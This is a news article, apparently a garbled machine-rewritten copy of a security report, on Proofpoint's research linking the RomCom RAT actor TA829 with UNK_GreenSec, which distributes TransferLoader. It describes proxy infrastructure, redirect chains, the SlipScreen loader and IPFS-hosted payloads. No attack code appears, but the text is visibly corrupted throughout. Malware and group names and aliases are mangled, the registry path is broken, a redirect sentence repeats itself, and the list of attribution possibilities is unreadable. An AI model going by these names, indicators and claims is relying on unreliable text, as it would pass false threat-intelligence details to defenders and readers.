Cybersecurity researchers have flagged the tactical similarity between the threat actor behind the Romcom rat and the cluster where dubbing transfer devices are being observed to be delivered.
Under The Ta829, Enterprise Security Firm Proofpoint tracks activities related to transfer loaders to groups called UNK_Greensec. The latter are also known as cigars, the ambiguous Mantis, Storm-0978, Tropical Scorpius, UAC-0180, UAT-5647, UNC2596, and Boyd Ravis.
The company said it discovered UNK_Greensec as part of its investigation into TA829, explaining it uses “similar infrastructure, distribution tactics, landing pages and email lure themes.”
TA829 is like a rare hacking group in threat situations given its ability to carry out both espionage and financially motivated attacks. The hybrid groups alongside Russia are also linked to zero-day exploitation of security flaws in Mozilla Firefox and Microsoft Windows to provide Romcom RAT in attacks targeting global targets.
Earlier this year, Prodaft detailed threat actors using bulletproof hosting providers, savior tactics, and encrypted command and control (C2) communications for side step detection.
Meanwhile, TransferLoader was first documented by Zscaler Threatlabz in connection with the February 2025 campaign.
Proofpoint noted that the campaigns run by both TA829 and UNK_GREENSEC rely on REM proxy services deployed on Mikrotik routers that have been compromised due to upstream infrastructure. That said, the exact method used to violate these devices is unknown.
“REM proxy devices are likely to be rented to users to relay traffic,” the ProofPoint threat research team said. “In the observed campaign, both TA829 and UNK_GREENSEC use the service to relay traffic to new accounts of the free mail provider and send it to the target. The REM proxy service is used to launch similar campaigns via email accounts compromised by TA829.”
Given the similar format of sender addresses, it is likely that threat actors are using email builder utilities that facilitate the creation of Ens and sending supply emails through REM nodes.
The message acts as a conduit for delivering links that are either embedded directly in the body or directly into the PDF installation. When you click on the link, if you ultimately bring the victim to a fake Google Drive or Microsoft OneDrive page, it will launch a series of redirects that will ultimately take the victim to a fake Google Drive or Microsoft OneDrive page, excluding machines that are deemed uninterested by the attacker.
At this stage, the enemy infrastructure to which the target is redirected is different, so the attack will split into two, and in the end, in the case of UNK_GREENSEC, the malware stock called Slipscreen in the case of TA829.
“TA829 and UNK_GREENSEC both deployed Putty’s Plink utilities to set up the SSH tunnel, and both used the IPFS service to host those utilities in a follow-on activity,” Proofpoint said.
Slipscreen is a first stage loader designed to decrypt and load shellcode directly into memory and begin communicating with remote servers, but after a Windows registry check, it ensures that the target computer has at least 55 recent documents based on “HKCU\Software\Microsoft\Windows\Current\Currentorsion\Exporer\doctodocs”.
The infection sequence is used to deploy a downloader named MeltingClaw (aka Damasced Peacock) or Rustyclaw. It is used to drop backdoors like Shadyhammock and Dustyhammock, the former being used to fire Singlecamper (aka Snipbot), an updated version of the Romcom rat.
In addition to running reconnaissance commands on infected systems, Dustyhammock also has the ability to download additional payloads hosted on interplanetary file system (IPFS) networks.
Campaigns propagating Transferloaders are known to leverage employment opportunities-themed messages to trick victims, clicking on links that ostensibly lead to PDF resumes, and in fact downloading the transfer loader from IPFS WebShare.
The main purpose of Transferloader is to fly under the radar and provide more malware, such as Metasploit and Morpheus Ransomware. This is a rebranded version of Hellcat ransomware.
“Unlike the TA829 campaign, the JavaScript component of the TransferLoader campaign redirected users to different PHP endpoints on the same server, allowing operators to perform additional server-side filtering,” ProofPoint said. “UNK_GREENSEC used dynamic landing pages, but in many cases it was unrelated to OneDrive Spoof and was redirected to the final payload stored in IPFS WebShare.”
The overlapping commerce between TA829 and UNK_GREENSEC causes one of four possibilities –
Threat actors source distribution and infrastructure from the same third-party provider TA829, and acquire and distribute the infrastructure on its own, providing these services to UNK_GREENSEC UNK_GREENSEC. Same, and Transferloader is a new addition to their malware arsenal
“In the current threat landscape, points of overlap between cybercrime and espionage continue to increase, eliminating the unique barriers that separate criminals and national actors,” Proofpoint said. “Campaigns, indicators, and threat actor behavior have been converged, making attribution and clustering within the ecosystem more difficult.”
“There is not enough evidence to demonstrate the exact nature of the relationship between TA829 and UNK_Greensec, but there is a very high chance that there will be a link between the groups.”
Source link
